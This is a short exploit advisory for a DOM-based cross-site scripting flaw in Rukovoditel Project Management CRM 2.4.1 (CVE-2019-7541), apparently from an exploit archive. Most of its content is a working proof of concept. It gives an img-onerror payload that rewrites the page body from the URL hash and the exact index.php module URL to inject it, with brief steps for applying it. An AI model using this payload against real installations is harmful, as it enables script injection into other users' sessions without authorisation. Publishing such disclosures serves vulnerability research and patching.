Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting

2019-02-13 17:05:06


# Exploit Title : Rukovoditel Project Management CRM 2.4.1 - XSS Vulnerability (DOM BASED)
# Author [ Discovered By ] : Mehmet EMIROGLU
# Date : 29/01/2019
# Vendor Homepage :
# Software Link :
# Affected Versions : 2.4.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : Medium
# CVE : 2019-7541
# Sofrware Description : Rukovoditel is a free web-based open-source
project management
application. A far cry from traditional applications, Rukovoditel gives
users a broader and extensive approach to project management. Its
customization options allow users to create additional entities, modify
and specify the relationship between them, and generate the necessary


# Impact :

* This web application called as Rukovoditel Project Management CRM 2.4.1
* first of all, delete the value string from the URL
* after, add the XSS code I've given below to the end of the URL.
* The proof will be the picture below.


# PoC :
* XSS Code : "><img src=x
onerror=document.body.innerHTML=location.hash>#"><img src=x
* Value : users/login
* Get Request : http://localhost/[PATH]/index.php?module=users/login
* URL : http://localhost/rukovoditel/index.php?module="><img src=x
onerror=document.body.innerHTML=location.hash>#"><img src=x



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